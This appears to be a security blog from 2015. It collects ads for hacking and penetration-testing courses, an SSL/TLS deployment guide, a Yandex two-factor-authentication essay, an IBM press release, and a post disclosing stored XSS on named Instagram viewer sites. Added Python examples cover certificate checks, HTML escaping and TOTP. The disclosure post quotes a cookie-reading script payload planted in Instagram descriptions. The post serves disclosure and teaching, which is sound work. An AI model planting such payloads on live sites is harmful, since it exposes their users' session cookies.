Sunday, August 23, 2015

The Complete Wireshark Course: Go from Beginner to Advanced!

Wireshark is much easier to learn when you take this course and try everything you see for yourself! Wireshark is a free open-source packet analyzer that is the number one tool for network analysis, troubleshooting, software and communications protocol development, and related education in networking. Knowing Wireshark gives you the ability to successfully apply for network administrator jobs and easily earn money as a freelancer online because Wireshark is an in-demand skill!
Use this course to speed up your learning of Wireshark with hands-on tutorials showing you exactly what you can do in Wireshark, founded on explanations of basic network terminology, installing Wireshark, and a review of the basic functions. The course begins with the basics and continues to dive deeper, allowing you to follow along and try everything you see for yourself!
You should act on your feelings of love, hope, and faith to take this course now if you want to learn a valuable skill to use in your own company or to make money as a freelancer or employee working in a network administration job!
What are the requirements?
Have a computer capable of running Wireshark.
Consistent experience accessing the internet and working online.
What am I going to get from this course?
Over 36 lectures and 5 hours of content!
Use Wireshark as an advanced user.
Apply successfully for network admin jobs.
Work as a freelancer using the Wireshark skills learned in this course.
See how to add a Wireshark certificate to your LinkedIn profile!
What is the target audience?
Network administrators looking to build deeper knowledge of Wireshark.
Entrepreneurs desiring to learn more about network protocols.
Freelancers wishing to add an in-demand skill to their profile.

Learn Hacking using Backtrack 5

Welcome to "Learn Hacking using Backtrack 5". This is a course dedicated to learning the Backtrack 5 Linux OS along with many of the tools it comes with. Please note that everything on this course is purely educational and we are not responsible for your actions.
Backtrack Basics: New to Backtrack? Want to learn how to get started and learn the basics of hacking? Then this is where you want to start! These videos include how to install Backtrack, updating tools, and the protocol to follow when taking over a system.
Backtrack Intermediate: For those who want more than the basics. Includes web-based exploitation and the use of backdoors.
Backtrack Wireless: That magical piece of technology that gives you access over the airwaves, and its vulnerabilities.
Metasploit is an amazing framework for exploits and is updated almost every day. These videos cover some of the things Metasploit can do, and how to use it.
Tutorials on learning to code your own exploits and other useful things for penetration testing.
What are the requirements?
Internet
A computer which you can format and experiment with
What am I going to get from this course?
Over 27 lectures and 2.5 hours of content!
Learn Backtrack
Learn Nmap
Learn Metasploit
What is the target audience?
Hackers
Web Developers

Kali Linux - Backtrack Evolved

Kali Linux is the latest Linux distribution from Offensive Security, custom-built for the distinct purposes of performing network security audits and forensic investigations. Kali comes fully loaded with hundreds of integrated tools to perform every aspect of a penetration test.
Kali Linux - Backtrack Evolved: A Penetration Tester’s Guide helps you to develop practical and useful professional skills in the information security industry, while simultaneously delivering the high level of excitement and exhilaration that goes hand-in-hand with the world of computer and network hacking.
Cyber-crime is on the rise and information security is becoming more paramount than ever before. A single attack on a company’s network infrastructure can often result in irreparable damage to a company’s assets and/or reputation.
It is no longer sufficient to merely rely on traditional security measures. In order to ensure the security of critical information assets, it is essential to become familiar with the strategies, tactics, and techniques that are used by actual hackers who seek to compromise your network.
Kali Linux - Backtrack Evolved: A Penetration Tester’s Guide will prepare you to enter the world of professional hacking by ensuring that you are well versed with the skills needed and tools used to compromise the security of enterprise networks and information systems.
About the Author
Justin Hutchens currently works as a security consultant and regularly performs penetration tests and security assessments for a wide range of clients. He previously served in the United States Air Force where he worked as an intrusion detection specialist, network vulnerability analyst and malware forensic investigator for a large enterprise network with over 55,000 networked systems. He currently holds a Bachelor’s degree in Information Technology and multiple professional information security certifications, to include CISSP (Certified Information Systems Security Professional), OSCP (Offensive Security Certified Professional), eWPT (eLearnSecurity Web-Application Penetration Tester), GCIH (GIAC Certified Incident Handler), CNDA (Certified Network Defense Architect), CEH (Certified Ethical Hacker), ECSA (EC-Council Certified Security Analyst) and CHFI (Computer Hacking Forensic Investigator).
What are the requirements?
A basic understanding of Linux and TCP/IP will be helpful in understanding the content, but it is not essential.
What am I going to get from this course?
Over 40 lectures and 2.5 hours of content!
Many advanced techniques are addressed within this series, but it is still designed to simultaneously accommodate less experienced viewers. The series provides detailed explanations intended to clearly address the underlying processes involved with all tasks performed.
What is the target audience?
Kali Linux - Backtrack Evolved: A Penetration Tester’s Guide is a great choice for anybody interested in information security, penetration testing or ethical hacking. While a basic understanding of Linux and TCP/IP will be helpful in understanding the content, it is not essential.

Hacking Academy: METASPLOIT - Penetration Tests from Scratch

Learn the most popular pentesting framework: METASPLOIT.
If you are thinking about IT Security seriously - you have to get to know Metasploit. Learn how to use it, conduct attacks, find vulnerabilities and patch them.
Find security issues, verify vulnerability mitigations & manage security assessments with Metasploit.
The first complete training, explained from scratch. You will see in step-by-step presentations what to do. An IT Security Academy expert will explain how it works and how to use Metasploit.
Take your IT Security knowledge to the next level.
What are the requirements?
General IT Knowledge
Knowledge on the level of IT Security Beginner Training
No programming skills needed
Good to know how to use Linux/Unix OS
What am I going to get from this course?
Over 9 lectures and 3 hours of content!
Learn how to use Metasploit framework
How to conduct penetration tests on databases and applications
Learn how to conduct attacks and test vulnerabilities
How to take control of running computers
What is the target audience?
Future Pentesters
IT Security Professionals
IT Security Hobbyists
Graduates of our IT Security Beginner Training
Graduates of our IT Security Professional Training
Programmers

BackTrack 5 Wireless Penetration Testing

Armed with the essentials, you will learn how to conduct a host of cutting edge wireless attacks. You will learn how to execute attacks such as WLAN packet sniffing, revealing hidden SSIDs, open authentication by defeating MAC address filters, bypassing shared authentication, cracking WEP and WPA/WPA2 encryption.
In addition to documenting the essentials of wireless penetration testing, we will also discuss setting up rogue APs and wireless evil twins, client-based WEP cracking attacks, wireless infrastructure-based attacks, WPS PIN brute force attacks, denial of service (DoS) attacks, eavesdropping and session hijacking, EAP-based enterprise wireless hacking; and much more. Coverage also includes various countermeasures to protect wireless networks against these types of attacks, in order to help bolster the wireless security of any given network.
About the Author
Farrukh Haroon Farhat is an information security professional with over 8 years of experience. He currently works as a Security Analyst in IBM's Global Technology Services (GTS) division. As a member of the Managed Security Services (MSS) operations team, Farrukh works with multi-vendor network security technologies, helping customers improve their security posture. He previously worked as the IT Security Manager for an emerging telecom operator based in the Middle East. He has also delivered various professional trainings related to Information Security and Networking. Farrukh holds various industry certifications such as CISSP, CISA, CCIE Security (#20184), JNCIE-Security (#91) et al. He actively contributes to various online communities related to network security, such as Cisco Netpro. As a result of his contribution to Cisco's official support community, he was awarded the 'Cisco Designated VIP (Security)' accreditation in 2011.
What are the requirements?
The course assumes that you already know the basics of wireless networks and can operate at least one Linux distribution.
Designed as a practical video tutorial with step-by-step instructions to teach you about Wireless Penetration Testing, the course has been designed to ensure that topics are presented in a gradual manner, allowing you to grasp the information that's being presented before moving on to more advanced topics.
What am I going to get from this course?
Over 35 lectures and 3.5 hours of content!
Crack WEP, WPA, WPA2, WPS and EAP/RADIUS based wireless networks
Create a practice lab for wireless penetration testing purposes
Sniff and analyze wireless packets from the air
Penetrate wireless networks based on the enterprise versions of WPA and WPA2
Attack the WLAN infrastructure itself using DoS attacks, fake APs, and other techniques
What is the target audience?
This course is aimed at security professionals and IT professionals who want to learn about wireless penetration testing using the BackTrack Linux security distribution.

Advanced Penetration Testing for Highly-Secured Environments

Advanced Penetration Testing for Highly-Secured Environments will teach you how to effectively secure any environment and harden your system and network configurations. You will get into the attacker's mindset, see how they target systems on a network and the overwhelming threats they pose, and then exploit those vulnerabilities in a step-by-step virtual lab in order to protect your system.
The goal of the Advanced Penetration Testing for Highly-Secured Environments video course is to first prepare and then challenge your skills and ability to perform a full penetration test against a fictional business company. It is packed with examples that enforce enumeration, exploitation, post-exploitation, writing reports skills, and more.
To start off you will get to know the differences between penetration testing and vulnerability assessments through a structured process of starting a penetration test and finishing it with a detailed report.
If you are looking to advance in the IT security field, through advanced exploitation techniques and strategies, then this video course is for you.
About the Author
Aaron Johns currently works for Intrasect Technologies as an IT Specialist. He provides support for over 160 clients. His work roles include maintaining business networks and security policies to increase operational efficiencies and reduce costs.
Aaron also publishes videos and books for Packt Publishing, one of the most prolific and fast-growing tech book publishers in the world. He has also filmed several independent videos.
Aaron started broadcasting YouTube videos in 2007. In 2009, he was offered a partnership with YouTube. He has provided security awareness to over 1.2 million viewers and 6,300 subscribers. As of today, Aaron still serves as a Technology Partner for YouTube. He is also in partnership with Symantec Corporation and Check Point Software Technologies Ltd. You'll also find Aaron as a guest or interviewed as a security professional on several YouTube videos and podcasts.
What are the requirements?
This video course takes a progressive approach by first unraveling advanced security techniques and then applying these techniques in a fictional environment. It is thoroughly educational and gives users the opportunity to test their skills.
What am I going to get from this course?
Over 40 lectures and 3 hours of content!
Learn information gathering/Footprinting techniques and enumeration techniques
See how to gain both physical and remote access to secured systems
Navigate through the command prompt and Linux terminal along with the Backtrack 5 R3 Linux operating system
Understand the Metasploit Framework, Social-Engineering Toolkit, Nmap, Zenmap, and more
Learn how to deal with client-side exploitation attacks and advanced techniques to bypass firewalls, IDS, and IPS systems
Create a virtual penetration testing lab
Discover the usage of all the security tools
Generate a full, detailed penetration testing report
What is the target audience?
The Advanced Penetration Testing for Highly-Secured Environments video course is aimed at both newcomers and experienced professionals who wish to gain hands-on experience of advanced penetration testing. You will need elementary IT skills and concepts, knowledge of common network protocols such as TCP/IP, and a basic understanding of penetration testing.

Tuesday, February 3, 2015

Best practices for SSL/TLS deployment

We are sharing a translation of a useful article on how to properly deploy SSL/TLS on your site. Today the theory; the second (practical) part will follow after launch.

Introduction

SSL/TLS seems a deceptively simple technology. It is easy to deploy, and then it just works, but without providing an adequate level of security. The real problem is that SSL/TLS is not easy to deploy correctly. For TLS to provide the necessary security, system administrators and developers have to make an extra effort in configuring their servers and developing their applications.

In 2009, Qualys SSL Labs began working on SSL. The goal was to understand how TLS is used in practice and to remedy the lack of easy-to-use TLS tools and of documentation. Through its global research on TLS usage and its online assessment tools, Qualys SSL Labs has reached some of those goals, but the lack of documentation is still felt. This document is a step toward addressing that problem.

1. The private key and certificate

The quality of the protection TLS provides depends entirely on the private key, which lays the foundation of that security, and on the certificate, which conveys the server's authenticity to its visitors.

1.1 Use 2048-bit private keys

Use 2048-bit RSA or 256-bit ECDSA private keys for all your servers. Keys of this strength are secure and will remain so for a significant period of time. If you still have 1024-bit RSA keys, replace them with stronger keys as soon as possible.

1.2 Protecting the private key

Treat your private keys as an important asset, giving access to the smallest possible group of employees. Recommended actions:

• Generate private keys and certificate signing requests (CSRs) on a trusted computer. Some CAs offer to generate the keys and CSRs for you, but this is not advisable.

• Protect private keys with a password so that they are not compromised when stored on backup systems. Password protection of the private key does not help on the production server, because an attacker can extract the key from the process's memory. There are hardware devices that can protect the private key even if the server is compromised, but they are expensive and therefore justified only in organizations with high security requirements.

• After a compromise, revoke the old certificates and generate new keys.

• Renew certificates every year, and always with a new private key.

1.3 Ensure coverage of all domain names in use

Make sure your certificates cover all the domain names you want to use on the site. For example, your primary domain is www.example.com, but you also use the domain www.example.net. Your goal is to avoid invalid-certificate warnings, which confuse your users and weaken their confidence.

Even when the server is configured for only one domain name, keep in mind that you cannot control how users reach your site or which links point to it. In most cases you should make sure the certificate works both with and without www (for example, for example.com and for www.example.com). A secure web server must have a certificate that is valid for every configured domain name. Wildcard certificates have their advantages, but should be avoided if using them means handing the private key to a large group of people, such as system administrators in different organizations. Also keep in mind that a wildcard certificate lets an attacker carry a vulnerability from one web site over to every other site that uses the same certificate.
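As an added example (not code from the Qualys document or from this blog), here is a small Python audit of the checks in sections 1.2 and 1.3, run against a certificate summary in the dict format that Python's `ssl` module returns from `getpeercert()`. The sample certificate dict is constructed; key size and signature algorithm are not part of that summary, so those two checks still need `openssl x509 -text` or a full X.509 parser.

```python
import ssl

# Constructed sample in the dict format that ssl.SSLSocket.getpeercert() returns
# (not a real certificate): one SAN entry plus a wildcard, valid for one year.
SAMPLE_CERT = {
    "subject": ((("commonName", "www.example.com"),),),
    "subjectAltName": (("DNS", "www.example.com"), ("DNS", "*.example.net")),
    "notBefore": "Jan 10 00:00:00 2015 GMT",
    "notAfter": "Jan 10 00:00:00 2016 GMT",
}


def hostname_matches(pattern, hostname):
    """Does a certificate name cover a host, with the wildcard rules browsers apply?

    Matching is case-insensitive; '*' is honoured only as the whole leftmost label,
    and it covers exactly one label: '*.example.net' covers 'www.example.net' but
    neither 'example.net' nor 'a.b.example.net'.
    """
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if pattern == hostname:
        return True
    if not pattern.startswith("*."):
        return False
    labels = hostname.split(".")
    return len(labels) >= 3 and ".".join(labels[1:]) == pattern[2:]


def certificate_names(cert):
    """DNS names the certificate is valid for: the SAN list, or the CN when SAN is absent."""
    names = [value for kind, value in cert.get("subjectAltName", ()) if kind == "DNS"]
    if not names:
        names = [value for rdn in cert.get("subject", ())
                 for kind, value in rdn if kind == "commonName"]
    return names


def validity_days(cert):
    """Length of the validity period in days (ssl.cert_time_to_seconds parses the GMT strings)."""
    start = ssl.cert_time_to_seconds(cert["notBefore"])
    end = ssl.cert_time_to_seconds(cert["notAfter"])
    return (end - start) / 86400


def audit_certificate(cert, configured_hosts):
    """Return a list of findings; an empty list means sections 1.2 and 1.3 are satisfied."""
    findings = []
    names = certificate_names(cert)

    # Section 1.3: every configured host must be covered both with and without the www label.
    wanted = set()
    for host in configured_hosts:
        wanted.add(host)
        wanted.add(host[4:] if host.startswith("www.") else "www." + host)
    for host in sorted(wanted):
        if not any(hostname_matches(name, host) for name in names):
            findings.append("not covered: " + host)

    # Section 1.3: a wildcard name is a warning, since its key tends to be shared widely.
    for name in names:
        if name.startswith("*."):
            findings.append("wildcard name " + name + ": check who holds its private key")

    # Section 1.2: certificates are renewed yearly with a new key, so flag longer validity.
    if validity_days(cert) > 366:
        findings.append("validity period longer than one year")
    return findings


if __name__ == "__main__":
    for finding in audit_certificate(SAMPLE_CERT, ["www.example.com", "www.example.net"]):
        print(finding)
```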

1.4. Buy certificates from a trusted Certification Authority

Choose a reputable certification authority (CA) that takes care of its business and its security. Consider the following criteria when choosing a CA:

Attitude to security

All CAs pass regular audits (otherwise they would not be entitled to act as a CA), but some take security more seriously than others. Finding out which ones is not easy, but one way is to study their history of security incidents: how they reacted to compromises and incidents, and whether they learned from their mistakes.

Core business

A CA whose core business is issuing certificates will lose that business if it does something horribly wrong, and it is unlikely to neglect its certificate division while pursuing potentially more lucrative opportunities elsewhere.

Services offered

At a minimum, the selected CA should support Certificate Revocation Lists (CRL) and the OCSP protocol.

Certificate management tools

If you need a large number of certificates, choose a CA that gives you good tools to manage them.

Support

Choose a CA that provides good support when you need it.

1.5. Use reliable certificate signature algorithms

The security of a certificate depends on the length and strength of the private key and on the hash function used to sign it. Today most certificates use the SHA1 algorithm, which is considered weak.

Replace immediately all of your certificates that use SHA1 if they expire after 2015.

XSS on sites using the Instagram API

While developing an application that uses the Instagram API, I noticed that the tags in the data it returns are not escaped. Of course, this is solved in a couple of lines of code. But I wondered: what if not all developers escape the tags when displaying the data on a page, because they trust the API? Who would expect a JS script instead of text in an Instagram profile description?

I found such sites.

First, I added a JS script to my profile description, and to the description of a few photos the line
<script> alert (document.cookie); </ script>
and several hashtags, including #instagramapi.

The first site I found was Iconosquare.

Iconosquare is a useful application for analyzing and managing your Instagram account. Its user-friendly web interface saves time and helps in communicating with followers. Iconosquare lets you browse profiles and search by hashtag.

On this site I searched for my picture by the hashtag #instagramapi; in my case it was a picture of a cat.

Clicking the photo takes me to a page containing the photo's description, but Iconosquare had forgotten to escape the HTML tags in it. This allowed the XSS.

Opening the page source, it was immediately clear that they had also forgotten to escape tags in the page's meta description.

On the profile page they do not sanitize the Instagram profile name and description either, with this result.

The next site I found was facegram.io.

As I understand it, facegram.io is another Instagram web viewer. The service has about 50,000 followers on Facebook, so I think it can be considered popular.

Here too we search for the hashtag #instagramapi, and here is the result:

The same happens on the user page.

In total I found 27 sites where an XSS attack is possible. I don't think it is necessary to describe them all; here are links to the pages with XSS.

A list of all sites
I tried writing to Iconosquare and to the support of a few other sites, but they did not react. Maybe some of you can tell the developers of these sites about the vulnerability.

P.S. This article was written to tell developers not to trust the data received from the Instagram API.
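As an added example (not code from this post, nor from Iconosquare or facegram.io), here is a Python rendering of API fields into a page body and its meta description, first the way the affected sites did it and then with escaping applied at the moment the text enters the HTML. The API response is constructed and reuses the payload quoted in the post.

```python
import html

# Constructed sample of the fields an Instagram-style API hands back as plain text.
# The caption carries the exact payload quoted in the post above; the bio adds a quote
# character, which matters once the text lands inside an HTML attribute.
API_RESPONSE = {
    "username": "cat_fan",
    "bio": "cat's photos <script> alert (document.cookie); </ script>",
    "caption": "my cat #instagramapi <script> alert (document.cookie); </ script>",
}

# The same template serves both renderings: the caption goes into the meta description
# (attribute context) and into the body (text context), exactly as the post describes.
PAGE_TEMPLATE = (
    '<meta name="description" content="{caption}">\n'
    "<h1>{username}</h1>\n"
    '<p class="bio">{bio}</p>\n'
    '<p class="caption">{caption}</p>'
)


def render_vulnerable(resp):
    """What the affected sites did: API text is pasted into the HTML as-is."""
    return PAGE_TEMPLATE.format(**resp)


def escape_html(text):
    # quote=True also converts " and ' so a value cannot close the content="..." attribute.
    return html.escape(text, quote=True)


def render_hardened(resp):
    """Same template, but every API field is escaped on output, whatever the API returned."""
    safe = {key: escape_html(value) for key, value in resp.items()}
    return PAGE_TEMPLATE.format(**safe)


def has_raw_script_tag(rendered):
    """Check helper: did a literal <script from the data survive into the page?"""
    return "<script" in rendered.lower()


if __name__ == "__main__":
    print(render_vulnerable(API_RESPONSE))
    print()
    print(render_hardened(API_RESPONSE))
```

`html.escape` is the right tool only for HTML text and quoted attribute values; a value placed inside a script block, a URL or an event handler needs that context's own encoding.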

Two-factor authentication that is convenient to use

It is rare for a Yandex blog post, especially one about security, not to mention two-factor authentication. We thought long and hard about how to strengthen the protection of user accounts, and to do so in a way that could be used without the inconveniences that come with the most common current implementations. Alas, they are inconvenient. According to some reports, on many major sites the share of users who enable additional means of authentication does not exceed 0.1%.

It seems the reason is that the common two-factor authentication scheme is too complicated and inconvenient. We have tried to devise a scheme that would be more convenient without lowering the level of protection, and today we present its beta version.

We hope it will become more widespread. For our part, we are ready to work on improving it and on its subsequent standardization.



After you enable two-factor authentication in Yandex.Passport, you will need to install the Yandex.Key application from the App Store or Google Play. The login form on the Yandex main page, in Mail and in Passport will then show a QR code. To sign in to the account you scan the QR code with the app, and that is all. If the QR code cannot be scanned, say because the camera does not work or the smartphone has no internet access, the application generates a one-time password that is valid for only 30 seconds.

Let me explain why we decided not to use "standard" mechanisms such as RFC 6238 and RFC 4226. How do the common two-factor authentication schemes work? They are two-stage. The first stage is ordinary authentication with username and password. If it succeeds, the site checks whether it "likes" this user's session or not, and if it does not, it asks the user to "re-authenticate". There are two common re-authentication methods: sending an SMS to the phone number tied to the account, and generating a second password on a smartphone. The second password is mostly generated with TOTP from RFC 6238. If the user enters the second password correctly, the session is considered fully authenticated; if not, the session loses even its "provisional" authentication.

Both methods, sending an SMS and generating a password, prove possession of the phone and are therefore a possession factor. The password entered at the first stage is a knowledge factor. Therefore this authentication scheme is not only two-stage, but also two-factor.

What struck us as problematic in this scheme?

Let's start with the fact that the average user's computer cannot always be called a model of security: Windows with updates switched off, a pirated copy without current antivirus signatures, software of dubious origin; none of this raises the level of protection. We estimate that compromise of the user's computer is the most popular way of "stealing" accounts (and recently there was yet another confirmation of this), and it is against this that we want to protect first of all. In a two-stage scheme, if we assume the user's computer is compromised, the password entered on it, the first factor, is compromised too. This means the attacker only needs to obtain the second factor. In common implementations of RFC 6238 the second factor is 6 decimal digits (the maximum prescribed by the specification is 8 digits). According to an OTP brute-force calculator, an attacker can pick the second factor in three days if the first one has somehow become known. It is not clear how the service can counter this attack without disturbing the normal work of the user. The only possible proof of work is a CAPTCHA, which in our view is a last resort.

The second problem is the opacity of the judgment about the quality of the user's session and of the decision that re-authentication is needed. To make matters worse, the service has no interest in making the process transparent, because what actually works here is security by obscurity. If an attacker knows on what basis the service decides that a session is legitimate, it can try to forge that data. From general considerations one can conclude that the judgment is based on the user's authentication history: IP addresses (and their derivatives, the autonomous system number that identifies the provider, and the location from a geo database) and browser data such as the User-Agent header and the set of cookies, Flash LSOs and HTML local storage. This means that an attacker who controls the user's computer can not only steal all the necessary data but also make use of the victim's IP address. Moreover, if the decision is made on the basis of the ASN, then any authentication from public Wi-Fi in a coffee shop could "poison" (from the security point of view) or "whitewash" (from the service's point of view) the coffee shop's provider, and with it, for example, every coffee shop in town. We have talked about our anomaly detection system, and it could be applied here, but the time between the first and second stages of authentication may not be enough to reach a definite judgment about an anomaly. In addition, the same argument destroys the idea of "trusted" computers: an attacker can steal any information on which that judgment is based.

Finally, two-stage authentication is simply uncomfortable: our usability studies show that nothing irritates users as much as an intermediate screen, an additional button press and other actions that are "unimportant" from their point of view.
For this reason, we decided that authentication should be single-stage, and that the password space should be much larger than can be achieved within "pure" RFC 6238.
At the same time we wanted, if possible, to keep authentication two-factor.

Multi-factor authentication is defined by assigning the items verified during authentication (which is why they are called factors) to one of three categories:
Knowledge factors (traditional passwords, PIN codes and the like);
Possession factors (used in OTP schemes; as a rule this is a smartphone, but it could also be a hardware token);
Biometric factors (the fingerprint is the most common today, although some will remember the episode with Wesley Snipes' character in the movie Demolition Man).

The development of our system

When we started to tackle the problem of two-factor authentication (the first pages on the subject in our corporate wiki date from 2012, but behind the scenes it was discussed earlier), the first idea was to take the standard authentication methods and apply them ourselves. We understood that we could not count on millions of our users buying a hardware token, so this option was postponed for some exotic cases (although we have not entirely given up on it; maybe we will come up with something interesting). The SMS route could not be massive either: it is a very unreliable delivery method (at the crucial moment an SMS may be delayed or never arrive), and sending SMS costs money (and the operators have begun to raise their prices). We decided that using SMS is a legacy of banks and other non-technology companies, and that we want to offer our users something more comfortable. In general, there was little choice: use the smartphone and a program on it as the second factor.

This form of single-stage authentication is widespread: the user remembers a PIN code (the first factor) and has on hand a hardware or software (smartphone) token that generates an OTP (the second factor). In the password field he enters the PIN followed by the current value of the OTP.
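As an added example (not Yandex's code, nor Yandex.Key), here is a Python implementation of the RFC 4226/RFC 6238 codes the post discusses, the single-field PIN+OTP check it describes, and the arithmetic behind the brute-force concern: with a 6-digit code and a drift window of one step either side, the server accepts 3 of the 1,000,000 possible codes, so the mean number of guesses is about 333,000, which at roughly 1.3 guesses per second is the three days quoted. The secret is the standard test-vector key from the RFCs; the PIN and verification window are assumptions of the example.

```python
import hashlib
import hmac
import struct

# Constructed test secret: the 20-byte ASCII key used in the RFC 4226 / RFC 6238 test vectors.
TEST_SECRET = b"12345678901234567890"


def hotp(secret, counter, digits=6):
    """HOTP (RFC 4226): HMAC-SHA1 over the 8-byte big-endian counter, then dynamic truncation."""
    mac = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


def totp(secret, unix_time, digits=6, step=30):
    """TOTP (RFC 6238): HOTP with the counter set to the number of 30-second steps since the epoch."""
    return hotp(secret, unix_time // step, digits)


def verify_totp(secret, candidate, unix_time, digits=6, step=30, window=1):
    """Accept the code for the current step and `window` steps either side (clock drift).

    Every extra accepted step is one more code a guess may hit, which is why the window
    also appears in the brute-force estimate below.
    """
    current = unix_time // step
    for drift in range(-window, window + 1):
        if hmac.compare_digest(hotp(secret, current + drift, digits), candidate):
            return True
    return False


def verify_single_stage(submitted, pin, secret, unix_time, digits=6):
    """The widespread one-step scheme from the post: the user types the PIN followed by the
    OTP in a single password field, so both factors are checked in one request."""
    if len(submitted) != len(pin) + digits:
        return False
    pin_part, otp_part = submitted[:-digits], submitted[-digits:]
    pin_ok = hmac.compare_digest(pin_part, pin)
    otp_ok = verify_totp(secret, otp_part, unix_time, digits)
    return pin_ok and otp_ok


def expected_guesses(digits=6, window=1):
    """Mean number of guesses to hit one of the 2*window+1 codes the server accepts."""
    return 10 ** digits / (2 * window + 1)


def expected_days(attempts_per_second, digits=6, window=1):
    """Mean time to guess the second factor once the first one is already known."""
    return expected_guesses(digits, window) / attempts_per_second / 86400


if __name__ == "__main__":
    print(totp(TEST_SECRET, 59), totp(TEST_SECRET, 59, digits=8))
    for digits in (6, 8):
        print(digits, "digits at 1.3 guesses/s:", round(expected_days(1.3, digits), 1), "days")
```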

Professional development in information security

Once again an article on information security, more precisely on how to become a certified information security specialist: how and where to study? What are the challenges of becoming a specialist in the field of information security? How to obtain an internationally recognized IS certificate? The answers to all these questions are in the review by our instructor, Kuzma Pashkov.

Because of the rapid development of information technology in general, and of information security (IS) as a science in particular, an IS specialist has to solve the problem of keeping their skills current. This has been true for more than a decade, but the conclusions drawn today about how to solve it differ significantly from those that were relevant 10 years ago. One of the main reasons for the difference is the completed transition from the risk-based approach to building secured automated systems to the normative one. There are two approaches:

• The risk-based approach
• Normative Approach

In the era of the risk-based approach, the focus was on building a business model and identifying the necessary and sufficient conditions for meeting the requirements of the security policy.

Protection systems were piece goods, in demand mainly from government agencies and large commercial organizations. To do the work of an IS specialist it was enough to have the well-developed mathematical background that leading technical universities give their students.

For all the variety of business models and security policies, the conditions for satisfying them turn out to be the same in the majority of cases. This fact made it possible to move to the normative approach to building security systems, in which the IS specialist concentrates on finding, analyzing and adapting a suitable family of open security standards. At the same time, secured versions of automated systems have become a widely demanded service in all spheres of human activity.

IS education

Thus an IS specialist necessarily needs to specialize in one of the following areas:

• implementation of the requirements of national laws and/or regulators (e.g. access to state or commercial secrets)
• use of certified information security products of specific vendors/manufacturers (engineering, commissioning, etc.)
• internationally recognized vendor-independent certifications

Many educational institutions, in both higher and additional vocational education, train specialists in the first two areas. It should be understood that these areas tie the professional to employers in a particular country, or rather allow him to work almost exclusively within the framework of national legislation and standards.



The advantages of international certification

The third area is oriented from the outset toward international open standards and methodologies of information security, in the expectation that developed and developing countries will seek to harmonize their national legislation with international standards because of the latter's fundamental advantages. A specialist with internationally recognized IS certifications is ready to adapt his experience to work in any country and, most importantly, to confirm his qualification to any employer, which, all else being equal, gives him an advantage over other candidates for the vacancy.

For a number of reasons, primarily historical and political, international information security standards are adopted in our country with a significant delay, and national legislation in this field is harmonized with them even more slowly. But the accelerating progress of globalization will inevitably lead us to the natural result, so a growing number of IS professionals seek to confirm their expertise with internationally recognized certifications.

IBM Research announced the launch of an innovative cloud technology to protect personal data

IBM researchers today announced the launch of a new cloud-based technology that will help customers improve the protection of their personal data on the Internet.

The technology, called Identity Mixer, uses a cryptographic algorithm to encrypt confirmed identity attributes of the user, such as age, nationality, address and credit card number. Using this technology, the user can transfer to a third party only the necessary amount of personal information. Identity Mixer can be used in an electronic wallet holding credentials confirmed by a trusted third party, such as information from electronic identity cards. It is important to note that the party issuing the credential receives no information about how and when the data is used.

"Identity Mixer enables users to choose what data should be provided and to whom," said Christina Peters, IBM's director for the protection of confidential information. "Thanks to this technology, web service providers can reduce their risks and increase customer confidence in their resource. Furthermore, the new solution lives in the cloud, which greatly simplifies the programming process for developers."

According to comScore, the average person spends about 25 hours per month on the Internet*, accessing dozens of different Internet services, including social networks, banking and online shopping sites. Almost every site requires creating a profile with a username and password, or with a cryptographic key for added security. Although these tools provide a sufficient level of security for many tasks, they usually do not guarantee the protection of confidential data, which leads to the disclosure of an excessive amount of personal information that can fall into the wrong hands, with serious consequences.



As an example, consider a video streaming service that offers movies with an age restriction. In order to watch a film recommended for persons older than 12, Alice needs to confirm that she is already 12 and that she lives in a particular region. To do this in the usual way Alice would need to enter her full date of birth and all the details of her address, which discloses a large amount of personal information. Identity Mixer can confirm that Alice is already 12 without disclosing the day, month and year of her birth, and show that she lives in a region where the service is available. Furthermore, even if the service is hacked, Alice's personal data remains safe.
If Alice needs to use a credit card to buy the film, the video streaming service can in the same way learn only that Alice's card is valid and that a payment can be made with it. The full card number and its expiration date are not disclosed.



Identity Mixer, previously available for download and running on smart cards, is now offered to developers as a convenient web service on the IBM Bluemix platform, an open PaaS cloud solution combining the strengths of IBM software, third-party and open source technologies. Since spring, Bluemix subscribers can take advantage of Identity Mixer to improve their applications and web services. With a convenient drop-down menu, developers can select the types of data they want to protect, and Bluemix in turn provides code that can then be integrated into their own solutions.
"Identity Mixer is the result of more than ten years of research whose main purpose is to minimize the disclosure of identity. At the moment the solution is ready for use in operations on PCs and on mobile devices," said Dr. Jan Camenisch, cryptographer at IBM Research and co-author of Identity Mixer.

"We wanted to ensure that every user can control the amount of personal information they give out about themselves," said Dr. Anna Lysyanskaya, co-author of Identity Mixer and professor in the Department of Computer Science at Brown University. "With the new cloud solution, developers have at their disposal a powerful tool for the cryptographic protection of personal data. Identity Mixer is a piece of software that can be built into identity management systems in order to eliminate the possibility of confidentiality breaches."

European and Australian pilot projects to demonstrate the capabilities of Identity Mixer


To demonstrate the capabilities of the new cloud-based version of Identity Mixer, IBM scientists together with academic and industrial partners in Europe and Australia are implementing a pilot project called Authentication and Authorization for Entrusted Unions (AU2EU). Over the two years of the programme, worth 8.6 million euro, scientists will test two applications of Identity Mixer: at the German Red Cross and at the Commonwealth Scientific and Industrial Research Organisation (CSIRO, Australia's national science agency).

The German Red Cross is the main centre for emergency telephone assistance and social services to citizens in the regions of Germany, providing specialized services to the population around the clock, in particular rescue operations, mobility assistance, housekeeping and medical treatment. The organization has about four million volunteers and professional staff in 52 hospitals and more than 500 nursing homes around the world.

As part of the pilot programme, 20 Red Cross patients in the south-west of Germany were given devices for assistance with daily activities and for monitoring health indicators. Data collected from these devices is transferred to a dedicated cloud server, where the information is analysed to determine the type of assistance required. In addition, Red Cross representatives received mobile devices for collecting and registering confidential client data, including medical records, information about medicines taken and relatives' contact details, for the subsequent conclusion of a service contract. Identity Mixer will be used to protect the confidentiality of this personal information. The project is implemented jointly with NEC Europe and Tunstall Healthcare.**

